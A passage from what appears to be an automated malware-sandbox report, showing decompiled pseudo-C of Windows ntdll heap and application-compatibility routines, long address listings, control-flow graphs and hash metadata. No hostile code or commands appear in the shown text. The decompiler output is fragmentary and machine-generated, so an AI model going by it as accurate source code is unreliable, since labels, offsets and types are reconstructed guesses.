													_t292 = _t377 + 8;
													_v356 = _t292;
													_t379 =  *_t292;
													_t347 = _t292[1];
													_v320 = _t379;
													_v316 = _t347;
													while(1) {
														_t341 = _t379;
														_v360 = _t341;
														_t371 = _t347;
														_v364 = _t371;
														_t293 = _t341 & 0x0000ffff;
														_v308 = _t293;
														if( *((char*)(_t377 + 0xe4)) != 0) {
															goto L67;
														}
														if(_t371 != 0) {
															__eflags = _t293;
															if(_t293 < 0) {
																__eflags = _v261;
																if(_v261 == 0) {
																	goto L41;
																}
															}
															_v249 = 0;
															_v316 = _t371 - 1;
															L42:
															_t297 = _t341;
															_t341 = _t379;
															asm("lock cmpxchg8b [esi]");
															_t379 = _t297;
															_v320 = _t379;
															_t347 = _t371;
															_v316 = _t347;
															if(_t379 != _v360 || _t347 != _v364) {
																continue;
															} else {
																_t298 = _v249;
																_v245 = _t298;
																if(_t298 != 0) {
																	goto L8;
																}
																goto L20;
															}
														}
														L41:
														_v249 = 1;
														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
														_v320 = _t379;
														goto L42;
													}
												}
												goto L67;
											}
											__eflags = _t342 - E1D7D7290;
											if(_t342 != E1D7D7290) {
												__eflags = _t342 - E1D7D5570;
												if(_t342 != E1D7D5570) {
													 *0x1d8c91e0();
													 *_t342();
													_v8 = 2;
													goto L34;
												}
												E1D7D5570( &_v216);
												goto L33;
											}
											E1D7D7290();
											goto L33;
										}
										L20:
										_push( &_v272);
										_t371 =  &_v244;
										_t347 = _t377;
										if(E1D7D6970(_t377,  &_v244) == 0) {
											goto L67;
										}
										if((_v84 & 0x00000001) != 0) {
											E1D7CBE18( &_v216);
											_v84 = _v84 & 0xfffffffe;
										}
										_t359 = _v272;
										_v228 = _t359;
										_v168 =  *((intOrPtr*)( *_t359));
										_v164 = _t359;
										_v144 = _v220;
										_t360 =  *[fs:0x18];
										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
										_t309 = _v220;
										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
											_t372 = _v160 | 0x00000008;
											_v160 = _t372;
											_t316 =  *[fs:0x18];
											_v408 = _t316;
											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
												_t317 = 1;
											} else {
												_t317 = 0;
											}
											if(_t317 != 0) {
												_t372 = _t372 | 0x00000004;
												_v160 = _t372;
											}
											if(E1D7D6929() != 0) {
												_v160 = _t372;
											}
											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
												_v160 = _v160 | 0x00000020;
											}
											_t322 =  *[fs:0x18];
											_v404 = _t322;
											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
												_v160 = _v160 | 0x00000040;
											}
											_t323 =  *[fs:0x18];
											_v380 = _t323;
											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
												_v160 = _v160 | 0x00000080;
											}
										}
										_v8 = 8;
										_t361 = _v272;
										_t384 =  *((intOrPtr*)( *_t361));
										_push(_t361);
										_push( &_v216);
										if(_t384 != E1D7D6B70) {
											__eflags = _t384 - E1D7D56E0;
											if(_t384 != E1D7D56E0) {
												 *0x1d8c91e0();
												 *_t384();
											} else {
												E1D7D56E0(_t361);
											}
										} else {
											E1D7D6B70();
										}
										goto L33;
									}
								}
							}
							_t268 =  *0x7ffe03c0;
							goto L16;
						}
					}
					E1D7D7F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
					_v252 = 1;
					_t379 = _v292;
					L1D7E2330(_t379 + 0x250, _t379 + 0x250);
					_v8 = 4;
					_t332 = _t379 + 0x254;
					_t368 =  *((intOrPtr*)(_t332 + 4));
					if( *_t368 != _t332) {
						asm("int 0x29");
						__eflags = _v292 + 0x250;
						return E1D7E24D0(_v292 + 0x250);
					}
					_v244 = _t332;
					_v240 = _t368;
					_t375 =  &_v244;
					 *_t368 = _t375;
					 *((intOrPtr*)(_t332 + 4)) = _t375;
					_v251 = 1;
					_v8 = 2;
					L71();
					E1D818F40( &_v216, 0, 0x98);
					_t389 = _t389 + 0xc;
					asm("lock inc dword [edi+0xf8]");
					_v250 = 1;
					_t371 =  &_v44;
					_t347 = _t377;
					E1D7D4A09(_t377,  &_v44, 0);
					goto L8;
				}
				_t339 =  *((intOrPtr*)(_t377 + 0x24));
				_v388 = _t339;
				_push(_t339);
				_t340 = E1D8129A0();
				_v276 = _t340;
				if(_t340 < 0) {
					goto L73;
				}
				asm("lock inc dword [edi]");
				_v246 = 1;
				goto L5;
			}












































































































                                                                            0x1d7d58e0
                                                                            0x1d7d58e0
                                                                            0x1d7d58e0
                                                                            0x1d7d58e5
                                                                            0x1d7d58e7
                                                                            0x1d7d58ec
                                                                            0x1d7d58f7
                                                                            0x1d7d58f8
                                                                            0x1d7d58fe
                                                                            0x1d7d5903
                                                                            0x1d7d5906
                                                                            0x1d7d5908
                                                                            0x1d7d590b
                                                                            0x1d7d590c
                                                                            0x1d7d590d
                                                                            0x1d7d590e
                                                                            0x1d7d5912
                                                                            0x1d7d5918
                                                                            0x1d7d591b
                                                                            0x1d7d591e
                                                                            0x1d7d5928
                                                                            0x1d7d592e
                                                                            0x1d7d5935
                                                                            0x1d7d593c
                                                                            0x1d7d5943
                                                                            0x1d7d594a
                                                                            0x1d7d5951
                                                                            0x1d7d5958
                                                                            0x1d7d595f
                                                                            0x1d7d5966
                                                                            0x1d7d5970
                                                                            0x1d7d597a
                                                                            0x1d7d5985
                                                                            0x1d7d598b
                                                                            0x1d7d5998
                                                                            0x1d7d599d
                                                                            0x1d7d59a3
                                                                            0x1d7d59a8
                                                                            0x1d7d59b0
                                                                            0x1d7d59b2
                                                                            0x1d7d59b8
                                                                            0x1d7d59b8
                                                                            0x1d7d59c8
                                                                            0x1d7d59cd
                                                                            0x1d7d59d0
                                                                            0x1d7d59d7
                                                                            0x1d7d59e5
                                                                            0x1d7d59ea
                                                                            0x1d7d59f8
                                                                            0x1d830745
                                                                            0x1d83074f
                                                                            0x1d83074f
                                                                            0x1d830756
                                                                            0x1d7d5a25
                                                                            0x1d7d5a25
                                                                            0x1d7d5a2c
                                                                            0x1d7d5a31
                                                                            0x1d7d5a38
                                                                            0x1d7d5fef
                                                                            0x1d7d5fef
                                                                            0x1d7d5ff6
                                                                            0x1d7d5ffb
                                                                            0x1d7d6002
                                                                            0x1d7d6007
                                                                            0x1d7d6007
                                                                            0x1d7d6009
                                                                            0x1d7d600f
                                                                            0x1d7d6017
                                                                            0x1d7d601c
                                                                            0x1d7d601c
                                                                            0x1d7d5b95
                                                                            0x1d7d5b99
                                                                            0x1d7d5f2d
                                                                            0x1d7d5f32
                                                                            0x1d7d5f36
                                                                            0x1d7d5f36
                                                                            0x1d7d5ba1
                                                                            0x1d7d5fcf
                                                                            0x1d7d5fcf
                                                                            0x1d7d5fd4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5fd6
                                                                            0x1d7d5fd6
                                                                            0x1d7d5fd9
                                                                            0x1d8307dc
                                                                            0x1d8307e3
                                                                            0x1d8307e5
                                                                            0x1d8307ea
                                                                            0x00000000
                                                                            0x1d8307ea
                                                                            0x1d7d5fdf
                                                                            0x1d7d5fe2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5fe8
                                                                            0x00000000
                                                                            0x1d7d5ba7
                                                                            0x1d7d5ba9
                                                                            0x1d7d5e71
                                                                            0x1d7d5e77
                                                                            0x1d7d5e79
                                                                            0x1d7d5bb4
                                                                            0x1d7d5bba
                                                                            0x1d830836
                                                                            0x1d83083a
                                                                            0x1d830841
                                                                            0x1d830847
                                                                            0x1d830847
                                                                            0x1d7d5bd4
                                                                            0x1d7d5bda
                                                                            0x1d7d5be0
                                                                            0x1d7d5be7
                                                                            0x00000000
                                                                            0x1d7d5bed
                                                                            0x1d7d5bf3
                                                                            0x1d7d5ae0
                                                                            0x1d7d5ae0
                                                                            0x1d7d5aec
                                                                            0x1d7d5aef
                                                                            0x1d7d5af2
                                                                            0x1d7d5af5
                                                                            0x1d7d5af8
                                                                            0x1d7d5afb
                                                                            0x1d7d5b07
                                                                            0x1d7d5f69
                                                                            0x1d7d5f73
                                                                            0x1d7d5f8b
                                                                            0x1d7d5f90
                                                                            0x1d7d5f92
                                                                            0x1d83077f
                                                                            0x1d83077f
                                                                            0x1d830789
                                                                            0x1d7d5b43
                                                                            0x1d7d5b43
                                                                            0x1d7d5b49
                                                                            0x1d7d5b53
                                                                            0x1d7d5b5a
                                                                            0x1d7d5b5d
                                                                            0x1d7d5b66
                                                                            0x1d7d5b67
                                                                            0x1d7d5b6d
                                                                            0x1d7d5b6e
                                                                            0x1d7d5b74
                                                                            0x1d7d5b7a
                                                                            0x1d7d5b7b
                                                                            0x1d7d5b80
                                                                            0x1d7d5b86
                                                                            0x1d7d5b8f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5b8f
                                                                            0x1d7d5f98
                                                                            0x1d7d5f98
                                                                            0x1d7d5f9e
                                                                            0x1d7d5fa0
                                                                            0x1d7d5fa7
                                                                            0x1d7d5fae
                                                                            0x1d7d5fb1
                                                                            0x00000000
                                                                            0x1d7d5fb1
                                                                            0x1d7d5b13
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5b19
                                                                            0x1d7d5b30
                                                                            0x1d7d5b35
                                                                            0x1d7d5b3b
                                                                            0x1d7d5b41
                                                                            0x00000000
                                                                            0x1d7d5b41
                                                                            0x1d7d5bf9
                                                                            0x1d7d5bfe
                                                                            0x1d7d5e84
                                                                            0x1d7d5e8d
                                                                            0x1d7d5e93
                                                                            0x1d7d5ea1
                                                                            0x1d7d5ea9
                                                                            0x1d7d5eb4
                                                                            0x1d7d5eb9
                                                                            0x1d7d5ec0
                                                                            0x1d7d5ec6
                                                                            0x1d7d5ec7
                                                                            0x1d7d5ed0
                                                                            0x1d7d5ed1
                                                                            0x1d7d5ed2
                                                                            0x1d7d5ed8
                                                                            0x1d7d5f15
                                                                            0x1d7d5d52
                                                                            0x1d7d5d52
                                                                            0x1d7d5d59
                                                                            0x1d7d5d60
                                                                            0x1d830909
                                                                            0x1d830909
                                                                            0x1d7d5d6d
                                                                            0x1d7d5d74
                                                                            0x1d7d5d81
                                                                            0x1d7d5d86
                                                                            0x1d7d5d8d
                                                                            0x1d7d5d9e
                                                                            0x1d830955
                                                                            0x1d830958
                                                                            0x1d83095e
                                                                            0x1d830960
                                                                            0x1d830963
                                                                            0x1d830969
                                                                            0x1d830969
                                                                            0x1d83096f
                                                                            0x1d83096f
                                                                            0x1d83096f
                                                                            0x1d83096f
                                                                            0x1d830971
                                                                            0x1d830977
                                                                            0x1d830979
                                                                            0x1d830989
                                                                            0x1d830992
                                                                            0x1d830998
                                                                            0x1d83099c
                                                                            0x1d83099e
                                                                            0x1d8309a4
                                                                            0x1d8309a6
                                                                            0x1d8309ac
                                                                            0x1d8309ac
                                                                            0x1d8309b4
                                                                            0x1d8309b4
                                                                            0x1d8309bc
                                                                            0x1d8309c6
                                                                            0x1d8309ce
                                                                            0x1d8309cf
                                                                            0x1d8309d1
                                                                            0x1d8309d4
                                                                            0x1d7d5da4
                                                                            0x1d7d5da4
                                                                            0x1d7d5dac
                                                                            0x1d7d5f0b
                                                                            0x1d7d5f0b
                                                                            0x1d7d5db8
                                                                            0x1d8309e2
                                                                            0x1d8309e9
                                                                            0x1d8309ef
                                                                            0x1d8309ef
                                                                            0x1d7d5dbe
                                                                            0x1d7d5dc1
                                                                            0x1d7d5dc7
                                                                            0x1d7d5dc9
                                                                            0x1d7d5dcc
                                                                            0x1d7d5dd2
                                                                            0x1d7d5de0
                                                                            0x1d7d5de0
                                                                            0x1d7d5de2
                                                                            0x1d7d5de8
                                                                            0x1d7d5dea
                                                                            0x1d7d5df0
                                                                            0x1d7d5df3
                                                                            0x1d7d5e00
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5e08
                                                                            0x1d7d5eec
                                                                            0x1d7d5eef
                                                                            0x1d8309f9
                                                                            0x1d830a00
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d830a06
                                                                            0x1d7d5ef7
                                                                            0x1d7d5f00
                                                                            0x1d7d5e29
                                                                            0x1d7d5e29
                                                                            0x1d7d5e2c
                                                                            0x1d7d5e34
                                                                            0x1d7d5e38
                                                                            0x1d7d5e3a
                                                                            0x1d7d5e40
                                                                            0x1d7d5e42
                                                                            0x1d7d5e4e
                                                                            0x00000000
                                                                            0x1d7d5e58
                                                                            0x1d7d5e58
                                                                            0x1d7d5e5e
                                                                            0x1d7d5e66
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5e6c
                                                                            0x1d7d5e4e
                                                                            0x1d7d5e0e
                                                                            0x1d7d5e0e
                                                                            0x1d7d5e21
                                                                            0x1d7d5e23
                                                                            0x00000000
                                                                            0x1d7d5e23
                                                                            0x1d7d5de0
                                                                            0x00000000
                                                                            0x1d7d5d9e
                                                                            0x1d7d5eda
                                                                            0x1d7d5ee0
                                                                            0x1d7d5f53
                                                                            0x1d7d5f59
                                                                            0x1d7d602d
                                                                            0x1d7d6033
                                                                            0x1d7d6035
                                                                            0x00000000
                                                                            0x1d7d6035
                                                                            0x1d7d5f5f
                                                                            0x00000000
                                                                            0x1d7d5f5f
                                                                            0x1d7d5ee2
                                                                            0x00000000
                                                                            0x1d7d5ee2
                                                                            0x1d7d5c04
                                                                            0x1d7d5c0a
                                                                            0x1d7d5c0b
                                                                            0x1d7d5c11
                                                                            0x1d7d5c1a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5c24
                                                                            0x1d7d6047
                                                                            0x1d7d604c
                                                                            0x1d7d604c
                                                                            0x1d7d5c2a
                                                                            0x1d7d5c30
                                                                            0x1d7d5c3a
                                                                            0x1d7d5c40
                                                                            0x1d7d5c4c
                                                                            0x1d7d5c52
                                                                            0x1d7d5c5f
                                                                            0x1d7d5c68
                                                                            0x1d7d5c71
                                                                            0x1d7d5c7a
                                                                            0x1d7d5c7d
                                                                            0x1d7d5c85
                                                                            0x1d7d5c9e
                                                                            0x1d7d5ca1
                                                                            0x1d7d5ca7
                                                                            0x1d7d5cad
                                                                            0x1d7d5cba
                                                                            0x1d83087c
                                                                            0x1d7d5cc0
                                                                            0x1d7d5cc0
                                                                            0x1d7d5cc0
                                                                            0x1d7d5cc4
                                                                            0x1d830886
                                                                            0x1d830889
                                                                            0x1d830889
                                                                            0x1d7d5cd1
                                                                            0x1d830897
                                                                            0x1d830897
                                                                            0x1d7d5cf0
                                                                            0x1d8308a2
                                                                            0x1d8308a2
                                                                            0x1d7d5cf6
                                                                            0x1d7d5cfc
                                                                            0x1d7d5d09
                                                                            0x1d8308ae
                                                                            0x1d8308ae
                                                                            0x1d7d5d0f
                                                                            0x1d7d5d15
                                                                            0x1d7d5d22
                                                                            0x1d8308ba
                                                                            0x1d8308ba
                                                                            0x1d7d5d22
                                                                            0x1d7d5d28
                                                                            0x1d7d5d2f
                                                                            0x1d7d5d37
                                                                            0x1d7d5d39
                                                                            0x1d7d5d40
                                                                            0x1d7d5d47
                                                                            0x1d7d5f41
                                                                            0x1d7d5f47
                                                                            0x1d7d5fc2
                                                                            0x1d7d5fc8
                                                                            0x1d7d5f49
                                                                            0x1d7d5f49
                                                                            0x1d7d5f49
                                                                            0x1d7d5d4d
                                                                            0x1d7d5d4d
                                                                            0x1d7d5d4d
                                                                            0x00000000
                                                                            0x1d7d5d47
                                                                            0x1d7d5be7
                                                                            0x1d7d5e7f
                                                                            0x1d7d5baf
                                                                            0x00000000
                                                                            0x1d7d5baf
                                                                            0x1d7d5ba1
                                                                            0x1d7d5a46
                                                                            0x1d7d5a4b
                                                                            0x1d7d5a52
                                                                            0x1d7d5a5f
                                                                            0x1d7d5a64
                                                                            0x1d7d5a6b
                                                                            0x1d7d5a71
                                                                            0x1d7d5a76
                                                                            0x1d830772
                                                                            0x1d7d6068
                                                                            0x1d7d6073
                                                                            0x1d7d6073
                                                                            0x1d7d5a7c
                                                                            0x1d7d5a82
                                                                            0x1d7d5a88
                                                                            0x1d7d5a8e
                                                                            0x1d7d5a92
                                                                            0x1d7d5a95
                                                                            0x1d7d5a9c
                                                                            0x1d7d5aa3
                                                                            0x1d7d5ab6
                                                                            0x1d7d5abb
                                                                            0x1d7d5abe
                                                                            0x1d7d5ac5
                                                                            0x1d7d5ace
                                                                            0x1d7d5ad1
                                                                            0x1d7d5ad3
                                                                            0x00000000
                                                                            0x1d7d5ad3
                                                                            0x1d7d59fe
                                                                            0x1d7d5a01
                                                                            0x1d7d5a07
                                                                            0x1d7d5a08
                                                                            0x1d7d5a0d
                                                                            0x1d7d5a15
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d5a1b
                                                                            0x1d7d5a1e
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: adf92df4145473cb5c5d2dea7c2b4d1353950f818a64a2cdd75f2fbbb0a96f38
                                                                            • Instruction ID: 8a380a75cf5a92a801d81465042b2d9ab0f5afb94a6388185ae3732ea2da5cbc
                                                                            • Opcode Fuzzy Hash: adf92df4145473cb5c5d2dea7c2b4d1353950f818a64a2cdd75f2fbbb0a96f38
                                                                            • Instruction Fuzzy Hash: BE32477490476ADFDB61CF64C884BEDBBB0BB09324F0081EAD54DA7251D774AA84CF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D8AA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 974 1d8aa1f0-1d8aa269 call 1d7e2330 * 2 RtlDebugPrintTimes 980 1d8aa41f-1d8aa444 call 1d7e24d0 * 2 call 1d814b50 974->980 981 1d8aa26f-1d8aa27a 974->981 983 1d8aa27c-1d8aa289 981->983 984 1d8aa2a4 981->984 986 1d8aa28b-1d8aa28d 983->986 987 1d8aa28f-1d8aa295 983->987 988 1d8aa2a8-1d8aa2b4 984->988 986->987 990 1d8aa29b-1d8aa2a2 987->990 991 1d8aa373-1d8aa375 987->991 992 1d8aa2c1-1d8aa2c3 988->992 990->988 994 1d8aa39f-1d8aa3a1 991->994 995 1d8aa2b6-1d8aa2bc 992->995 996 1d8aa2c5-1d8aa2c7 992->996 1000 1d8aa3a7-1d8aa3b4 994->1000 1001 1d8aa2d5-1d8aa2fd RtlDebugPrintTimes 994->1001 998 1d8aa2be 995->998 999 1d8aa2cc-1d8aa2d0 995->999 996->994 998->992 1003 1d8aa3ec-1d8aa3ee 999->1003 1004 1d8aa3da-1d8aa3e6 1000->1004 1005 1d8aa3b6-1d8aa3c3 1000->1005 1001->980 1014 1d8aa303-1d8aa320 RtlDebugPrintTimes 1001->1014 1003->994 1008 1d8aa3fb-1d8aa3fd 1004->1008 1006 1d8aa3cb-1d8aa3d1 1005->1006 1007 1d8aa3c5-1d8aa3c9 1005->1007 1010 1d8aa4eb-1d8aa4ed 1006->1010 1011 1d8aa3d7 1006->1011 1007->1006 1012 1d8aa3ff-1d8aa401 1008->1012 1013 1d8aa3f0-1d8aa3f6 1008->1013 1015 1d8aa403-1d8aa409 1010->1015 1011->1004 1012->1015 1016 1d8aa3f8 1013->1016 1017 1d8aa447-1d8aa44b 1013->1017 1014->980 1022 1d8aa326-1d8aa34c RtlDebugPrintTimes 1014->1022 1019 1d8aa40b-1d8aa41d RtlDebugPrintTimes 1015->1019 1020 1d8aa450-1d8aa474 RtlDebugPrintTimes 1015->1020 1016->1008 1018 1d8aa51f-1d8aa521 1017->1018 1019->980 1020->980 1026 1d8aa476-1d8aa493 RtlDebugPrintTimes 1020->1026 1022->980 1027 1d8aa352-1d8aa354 1022->1027 1026->980 1034 1d8aa495-1d8aa4c4 RtlDebugPrintTimes 1026->1034 1028 1d8aa356-1d8aa363 1027->1028 1029 1d8aa377-1d8aa38a 1027->1029 1031 1d8aa36b-1d8aa371 1028->1031 1032 1d8aa365-1d8aa369 1028->1032 1033 1d8aa397-1d8aa399 1029->1033 1031->991 1031->1029 1032->1031 1035 1d8aa39b-1d8aa39d 1033->1035 1036 1d8aa38c-1d8aa392 1033->1036 1034->980 1040 1d8aa4ca-1d8aa4cc 1034->1040 1035->994 1037 1d8aa3e8-1d8aa3ea 1036->1037 1038 1d8aa394 1036->1038 1037->1003 1038->1033 1041 1d8aa4ce-1d8aa4db 1040->1041 1042 1d8aa4f2-1d8aa505 1040->1042 1043 1d8aa4dd-1d8aa4e1 1041->1043 1044 1d8aa4e3-1d8aa4e9 1041->1044 1045 1d8aa512-1d8aa514 1042->1045 1043->1044 1044->1010 1044->1042 1046 1d8aa516 1045->1046 1047 1d8aa507-1d8aa50d 1045->1047 1046->1012 1048 1d8aa51b-1d8aa51d 1047->1048 1049 1d8aa50f 1047->1049 1048->1018 1049->1045
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: HEAP:
                                                                            • API String ID: 3446177414-2466845122
                                                                            • Opcode ID: 8eba1d52e9c7a9c61882dd0e6a22134659b24c0b2832fb5b0220bf620f766b2a
                                                                            • Instruction ID: 8e911c398b10e21cf0a88194a4cf3d883d50ca29c6b8b253dee8615159ac3d72
                                                                            • Opcode Fuzzy Hash: 8eba1d52e9c7a9c61882dd0e6a22134659b24c0b2832fb5b0220bf620f766b2a
                                                                            • Instruction Fuzzy Hash: 69A17871A083128FC705CF28C894A2BB7E5BF88A50F05456EFA46DB720E770EC45CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D807550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1050 1d807550-1d807571 1051 1d807573-1d80758f call 1d7de580 1050->1051 1052 1d8075ab-1d8075b9 call 1d814b50 1050->1052 1057 1d807595-1d8075a2 1051->1057 1058 1d844443 1051->1058 1059 1d8075a4 1057->1059 1060 1d8075ba-1d8075c9 call 1d807738 1057->1060 1062 1d84444a-1d844450 1058->1062 1059->1052 1066 1d807621-1d80762a 1060->1066 1067 1d8075cb-1d8075e1 call 1d8076ed 1060->1067 1064 1d844456-1d8444c3 call 1d85ef10 call 1d818f40 RtlDebugPrintTimes BaseQueryModuleData 1062->1064 1065 1d8075e7-1d8075f0 call 1d807648 1062->1065 1064->1065 1084 1d8444c9-1d8444d1 1064->1084 1065->1066 1075 1d8075f2 1065->1075 1070 1d8075f8-1d807601 1066->1070 1067->1062 1067->1065 1077 1d807603-1d807612 call 1d80763b 1070->1077 1078 1d80762c-1d80762e 1070->1078 1075->1070 1079 1d807614-1d807616 1077->1079 1078->1079 1082 1d807630-1d807639 1079->1082 1083 1d807618-1d80761a 1079->1083 1082->1083 1083->1059 1086 1d80761c 1083->1086 1084->1065 1087 1d8444d7-1d8444de 1084->1087 1088 1d8445c9-1d8445db call 1d812b70 1086->1088 1087->1065 1089 1d8444e4-1d8444ef 1087->1089 1088->1059 1090 1d8445c4 call 1d814c68 1089->1090 1091 1d8444f5-1d84452e call 1d85ef10 call 1d81a9c0 1089->1091 1090->1088 1099 1d844546-1d844576 call 1d85ef10 1091->1099 1100 1d844530-1d844541 call 1d85ef10 1091->1100 1099->1065 1105 1d84457c-1d84458a call 1d81a690 1099->1105 1100->1066 1108 1d844591-1d8445ae call 1d85ef10 call 1d84cc1e 1105->1108 1109 1d84458c-1d84458e 1105->1109 1108->1065 1114 1d8445b4-1d8445bd 1108->1114 1109->1108 1114->1105 1115 1d8445bf 1114->1115 1115->1065
                                                                            C-Code - Quality: 63%
                                                                            			E1D807550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x1d8cb370 ^ _t107;
				_v8 =  *0x1d8cb370 ^ _t107;
				_t105 = __ecx;
				if( *0x1d8c6664 == 0) {
					L5:
					return E1D814B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E1D7DE580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E1D807738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E1D80763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E1D812B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E1D8076ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E1D85EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E1D818F40( &_v548, 0, 0x214);
						_t106 =  *0x1d8c6664;
						_t110 = _t108 + 0x20;
						 *0x1d8c91e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x1d8c6664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E1D814C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E1D85EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E1D81A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E1D85EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E1D81A690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E1D85EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E1D84CC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E1D85EF10();
						goto L15;
					}
					L8:
					_t56 = E1D807648(_t105);
					__eflags = _t56;
